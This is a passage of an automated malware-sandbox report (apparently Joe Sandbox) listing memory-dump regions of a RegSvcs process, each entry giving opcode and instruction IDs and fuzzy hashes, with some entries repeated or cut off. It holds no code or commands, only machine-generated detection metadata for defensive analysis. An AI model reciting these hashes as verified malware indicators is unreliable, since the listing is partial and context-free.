                                                                                                              • Instruction Fuzzy Hash: B9017832680681DFE326861DC948F2EBBE8FB88794F4904A1FA05CF6A1D678DC40C661
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                                                                              • Instruction ID: 6cc030d491305e450f8b05f5bb72dabfaa3385787f30fbe58d59d3b01a98685d
                                                                                                              • Opcode Fuzzy Hash: 50154aa9374597af48b230b89c7c624d5e918e43f43f83987a66e9a259c60465
                                                                                                              • Instruction Fuzzy Hash: 6D018431700A09DBDB14FB69DC149AE77E9FF81610B594169DA02BF644EE20DD01C794
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                                                                              • Instruction ID: 4db9de742a750e5a2d4baec6db52aa9a223a150fe81323f3aca4c333af119f5c
                                                                                                              • Opcode Fuzzy Hash: a8ff3a73214f97ab2e6b9e8b475892ce9029398fd875968d727389869df5d174
                                                                                                              • Instruction Fuzzy Hash: 62018F71680602AFD3366F19DD41F16BAA8AF95F50F01442AE2069F390D7B1D8418B68
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bffc3cfe6f30539782651115a4148e5cf654556a4943605ee886c577cbef9d8
                                                                                                              • Instruction ID: 44492d2ceaf5e4fe2fd048af4741ce7187c71b1960e4ba66756c8eb646af87c0
                                                                                                              • Opcode Fuzzy Hash: 0bffc3cfe6f30539782651115a4148e5cf654556a4943605ee886c577cbef9d8
                                                                                                              • Instruction Fuzzy Hash: 83F0A932A41711BBC731DB568D50F5BBEA9FFC4B90F154429A6059F640DA30DD01C6A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction ID: ec5709b8e8d06f22214f30a710943d5235413cc96c4b33a7a736e5ecfbc925c8
                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                              • Instruction Fuzzy Hash: 9DF062B2600615ABD334CF4DDC40E5BFBEAEBD5A90F058169A655DB220EA31ED05CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 63a459c41247ce3840923c2050808af652d257fb008746d452961558af114f77
                                                                                                              • Instruction ID: d54ec5bd5e72320aab256aa20913cc8cf19d607a47fe79f428d8ae2e804f9ab0
                                                                                                              • Opcode Fuzzy Hash: 63a459c41247ce3840923c2050808af652d257fb008746d452961558af114f77
                                                                                                              • Instruction Fuzzy Hash: 83014471A1020AEFDB04DFADE95599EB7F8FF98304F10406AF904EB350D7749A018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction ID: 47b808f967b7de3f08240f374ba88e28acbe6445d1a4b40ea57335f3e7e289f4
                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                              • Instruction Fuzzy Hash: 49F0FC73244623ABD73236598840BAFB9D5BFE1A64F1A0035E205BF240CD648D0396F0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1aeea00990fc23f5e7952d9dd956eca532c93506c6da8865d04db64488a0999
                                                                                                              • Instruction ID: 0ad8ed437f5469048a41f82027ffd0f5a1253553def07e6f78293d820389be5e
                                                                                                              • Opcode Fuzzy Hash: d1aeea00990fc23f5e7952d9dd956eca532c93506c6da8865d04db64488a0999
                                                                                                              • Instruction Fuzzy Hash: 35014471A1020AEFCB04DFA9D8559AEB7F8FF98344F10806AF904EB351D6749901CBA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7b8dae689103e6e36277393409c24e9ffada239b32e29f0c55d9b8c1ab9fa4ac
                                                                                                              • Instruction ID: 439891507276de58aa8c208d2864cd6217ff5d22c64563f4920745ef451214f6
                                                                                                              • Opcode Fuzzy Hash: 7b8dae689103e6e36277393409c24e9ffada239b32e29f0c55d9b8c1ab9fa4ac
                                                                                                              • Instruction Fuzzy Hash: 010144B1A0020AEFDB04DFA9E84599EBBF8FF58304F50406AF914EB350D6749D018BA4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction ID: b1254094f2ea8d9aebf6e383ecf6f748c5bba85fa3f2e2584f973bd6e9122f30
                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                              • Instruction Fuzzy Hash: 2D01A231601685AFD327DA9DCD09B5EBB98FF51B54F094469FA488F7A1D7A4C800C251
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                                                                              • Instruction ID: 966dd5d5ac826c09ba6a55dba2f2a1430372830a4ba0bf20db5be4207e41a811
                                                                                                              • Opcode Fuzzy Hash: ec80a384fa4aaab53625206126903fb741f8e2e4df626ace2bd5daf22848a6f1
                                                                                                              • Instruction Fuzzy Hash: 5E014F71A0024AEBDB14DFA9E845AEEBBF8BF58314F14405AE501BB390D774EA01CB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction ID: 3fcf55d92ac92e28293a5e81589c798b1b60c854bc7449f00967924c6c8e5a91
                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                              • Instruction Fuzzy Hash: A0F0F97220001EBFEF019F95DD80DAF7B7EFB99298B144125FA1196160D671DD21ABA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                                                                              • Instruction ID: 14c5b314d34cdd41e0af1a91eaece8d08b773bd5f13592661311feee7b91f8db
                                                                                                              • Opcode Fuzzy Hash: eea92a17f872b10cce13c26eb580bb3f63d335f1f7dafb6c3244fc3f10383c36
                                                                                                              • Instruction Fuzzy Hash: 17018936105149EBCF129E94DC40EDE7F66FB4C754F098205FE1966224C736D971EB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                                                                              • Instruction ID: a5a6e15789e29eddcf7423360b0723a4b3ec04de62c4fbf73df7568bac72b3e7
                                                                                                              • Opcode Fuzzy Hash: 17d3c91de0edac1a8945bebf03e70381161d84a9a480369144bab9a83bc1f1ec
                                                                                                              • Instruction Fuzzy Hash: A8F024716142425BF714B6299C81BA332DAF7E4754F25846AEB099F2C1E970DC0183F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                                                                              • Instruction ID: bd4793aba174694b5354ea48b8f623765206a07d90f5be9a2959a0905b55ea6a
                                                                                                              • Opcode Fuzzy Hash: 5c71df7c926db4e626c18f06ce154917c9cd0163fc5111427db1a1d604929e96
                                                                                                              • Instruction Fuzzy Hash: 3701A470240682DFF3379FACCD48B2A77E4BB54F44F980598BA018F7DADB68D5018614
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 9e8200905a20c2269d5b47346d29558f5b820e4f1fbe1e005126a7d14914af1b
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: DDF0E231B81A234BFB36AA2F8C20B2EEA96AFD0E40B05052C9611CB780DF20DC018780
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: d2cd73ffa624666e99a351d539025162e6d293e6f9bc20b6787d1d6fddddb455
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 03F0B432B505129FD3628A4DDC80F16B769BFD5A60F5E0024AE049B368C361EC0287D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: 6c36053f0a5f77db29a7c20267df18aca3f93866cf8f2535144126d27d114eae
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: 47D0A932664620AFD772AA1CFC00FC373EABB88724F060459B008CB1A1C360AC81CA84
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: 6010ea78b23dd19496801a6139fa296e7fd34204ad16b3d688f7b4d4e78d8c9f
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: 02E0EC35950685AFDF57DF99DA40F5EBBB5FB94B40F150458A1085F760C725AD00CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: 825880ed5741cdc4aac78e71acdeb43f70be195a92d5c6644828a193599619db
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 0BD02232222031E7CB286655AC10F6BB906BFC0A94F0A002E340AAB800C1048C43C2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: 2fa26d15f785120ec18f3ab6f7575dc7b4176845ad096b03dae116b254a8e9e6
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 58D012371E054DBBCB119F66DC01F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                                                                              • Instruction ID: 947b91c54d802c05fd1419757f259393ed52c2cf8551192e1c6dba43fa456fb8
                                                                                                              • Opcode Fuzzy Hash: fb29844d38a1584afe132ef9516276f3ed454406c3d1a3f94fd294ac1a50fa7a
                                                                                                              • Instruction Fuzzy Hash: 3CD05E309520029FDF2BCF48CD2493E76B4FF10A40B44106CE60056520D364D8118600
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 82c5409723fa28ea16e91945672af4918bea3b98d56a786d27baa5532a79deac
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: 23D09235262A80CFD62A8B0DC5A4B1A33A4BB44A44FC10890E501CBB62D628D940CA00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: b3023dcff4b48f0aa33b8c09e1b73c57248b87c66b3b405e5f460c6f5009ffbe
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: BAC01232190644AFC7119A95DD01F0577A9FB98B40F400021F2044B570C531E810D644
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: cfa90935653e1f96ba99cddd05dabf2e0da868f8dab5a743f52e084dd684df16
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 84D01236100249EFCB01DF45C890D9B773AFBD8710F108019FD190B6508A31ED62DA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 2ddb52f0178847bdcd60acb368396f35d5691dc1ebf857a686966725a0dc4cd8
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: FDC04C75751942CFCF15DB59D294F4977E4F744744F151890E805CF721E624E811CA10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                                                                              • Instruction ID: 24b509d7ad01b6683c582648da84ac9f27d8fbfb27457060e96d1accfcf4fcfc
                                                                                                              • Opcode Fuzzy Hash: 94347bc8fa33b41ba6e12a712de4f1edb88678d86355f8b58366af632f709f33
                                                                                                              • Instruction Fuzzy Hash: 3C900231A05800129144725848885464085B7E0311B59C411E0424954CCA548A565361
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                                                                              • Instruction ID: a57971b232265391d6aa44d401f57e352d1f022e7fea5d57f8fd1389c21f21c5
                                                                                                              • Opcode Fuzzy Hash: b68dde35d7436ee83983c0b8acd97f72298c6904471b4fd8ccf30c3fb9a42357
                                                                                                              • Instruction Fuzzy Hash: BB900261A01500424144725848084066085B7E1311399C515A0554960CC65889559369
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                                                                              • Instruction ID: f0b5f0935cc2dc9d4071a46ee16c8387cc77a1a461f7a89fb9a609990cdc0c89
                                                                                                              • Opcode Fuzzy Hash: 7d2da81e44176e18e9220a696409bafd716d725121281961c9fffbaae946fdc2
                                                                                                              • Instruction Fuzzy Hash: B490023160140802D1847258440864A0085A7D1311F99C415A0025A54DCA558B5977A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                                                                              • Instruction ID: 614686f1dc46d96de1cfb479a1cfecf753be10570fcb73329dfa6eba08d8e168
                                                                                                              • Opcode Fuzzy Hash: 0470f8d4fa1d84de2d2b54bfd885c4cdc05bb9920ce2b70264fe23acf4c1bea8
                                                                                                              • Instruction Fuzzy Hash: 9090023160544842D14472584408A460095A7D0315F59C411A0064A94DD6658E55B761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                                                                              • Instruction ID: 985e6b7801b1648b36a9335ceebd4114b4055a57615b1fe45ba16efd288526b3
                                                                                                              • Opcode Fuzzy Hash: 7d67d2923039c1429b3438ba8ab924b9c468a03824f0aff6730d8bdd826f0b59
                                                                                                              • Instruction Fuzzy Hash: A490023160140802D108725848086860085A7D0311F59C411A6024A55ED6A589917231
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                                                                              • Instruction ID: de08745e8afd6f0ed004d202abe6a3cade857f7759b5053ceda64f2c4fbe7644
                                                                                                              • Opcode Fuzzy Hash: 9f54186e4c01932bbba624496a5e5bc06748cbd6d4ed92341a4b1c4f2c0983aa
                                                                                                              • Instruction Fuzzy Hash: 8A900231A0540802D154725844187460085A7D0311F59C411A0024A54DC7958B5577A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                                                                              • Instruction ID: d0f760d3a659709de027d33b5a77410c8b655e8830763b12b83b3b23d4ce903a
                                                                                                              • Opcode Fuzzy Hash: e7ce4f9cd2493b148f848ae5c2a859a4f4ea65995d3b299214f1401a1f193771
                                                                                                              • Instruction Fuzzy Hash: 3E90022170140402D106725844186060089E7D1355F99C412E1424955DC6658A53A232
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
                                                                                                              • Instruction ID: d7adbcba0e9a8fbfc6a87e84133cd27eca80def3a3cc67819cface29b045b9aa
                                                                                                              • Opcode Fuzzy Hash: 92db9b83bbf18ea3f6eddb886597e2cf1c6a334dd21056741dd6a35575811274
